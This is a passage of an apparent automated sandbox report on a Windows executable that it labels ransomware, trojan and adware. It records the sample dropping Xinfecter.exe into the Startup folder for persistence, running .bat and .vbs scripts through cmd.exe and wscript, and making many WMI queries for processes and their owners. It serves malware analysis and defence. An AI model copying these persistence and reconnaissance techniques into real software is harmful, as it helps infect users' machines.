        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_0021930042_2_00219300
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_002E130442_2_002E1304
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_0028537042_2_00285370
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_0025160042_2_00251600
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_002A965A42_2_002A965A
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_0025969042_2_00259690
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_0027D73F42_2_0027D73F
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_0022B74042_2_0022B740
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_002757A742_2_002757A7
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_002757B442_2_002757B4
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_002B97F042_2_002B97F0
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_002B9A6242_2_002B9A62
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_00261AA042_2_00261AA0
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_0021BAB042_2_0021BAB0
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_0027DAC642_2_0027DAC6
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_00275B3B42_2_00275B3B
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_0021DB0042_2_0021DB00
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_00253B0042_2_00253B00
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_00255C0042_2_00255C00
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_002CBC8B42_2_002CBC8B
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_0027DD5742_2_0027DD57
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_0022FD5042_2_0022FD50
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_002C3DB342_2_002C3DB3
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_0029FDF042_2_0029FDF0
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_00251E3042_2_00251E30
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_002C3FE242_2_002C3FE2
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: String function: 002A1DB1 appears 83 times
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: String function: 0024A350 appears 64 times
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: String function: 002423A0 appears 69 times
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: String function: 002A1D7D appears 186 times
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: String function: 002488E0 appears 33 times
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: String function: 0024C0E0 appears 48 times
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: String function: 002A2380 appears 70 times
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: String function: 008E23A0 appears 69 times
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: String function: 00941D7D appears 186 times
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: String function: 008EA350 appears 64 times
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: String function: 00941DB1 appears 83 times
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: String function: 008E88E0 appears 33 times
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: String function: 008EC0E0 appears 48 times
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: String function: 00942380 appears 70 times
        Source: 8AbMCL2dxM.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: classification engineClassification label: mal100.rans.troj.adwa.evad.winEXE@119/22@1/2
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_008C60E0 PathIsNetworkPathA,__alloca_probe_16,MultiByteToWideChar,GetDiskFreeSpaceExW,1_2_008C60E0
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeJump to behavior
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1048:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6184:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3500:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7136:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1032:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6784:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7156:120:WilError_03
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.bat
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs"
        Source: 8AbMCL2dxM.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
        Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4"::GetOwner
        Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="92"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="328"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="412"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="488"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="496"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="560"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="632"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="652"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="752"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="780"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="788"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="868"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="928"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="996"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="436"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="376"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="60"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="980"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1040"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1064"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1140"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1192"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1248"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1328"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1344"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1356"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1448"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1496"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1516"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1528"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1560"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1640"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1648"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1784"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1872"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1900"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1980"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1988"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2000"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1704"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2076"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2088"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2148"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2236"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2288"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2412"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2424"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2516"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2552"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2560"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2600"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2624"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2648"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2692"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2764"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2916"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3008"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3624"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3668"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3808"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3952"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4168"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4356"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4400"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4804"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="5416"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="6016"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="5188"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="5428"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1888"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="5312"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="6296"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2260"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2752"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="5988"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="5796"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2436"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="516"::GetOwner
        Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
        Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Windows\SysWOW64\timeout.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = '8ABMCL2DXM.EXE'
        Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = '8ABMCL2DXM.EXE'
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="92"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="328"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="412"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="488"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="496"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="560"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="632"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="652"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="752"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="780"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="788"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="868"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="928"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="996"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="436"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="376"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="60"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="980"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1040"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1064"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1140"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1192"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1248"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1328"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1344"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1356"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1448"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1496"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1516"::GetOwner
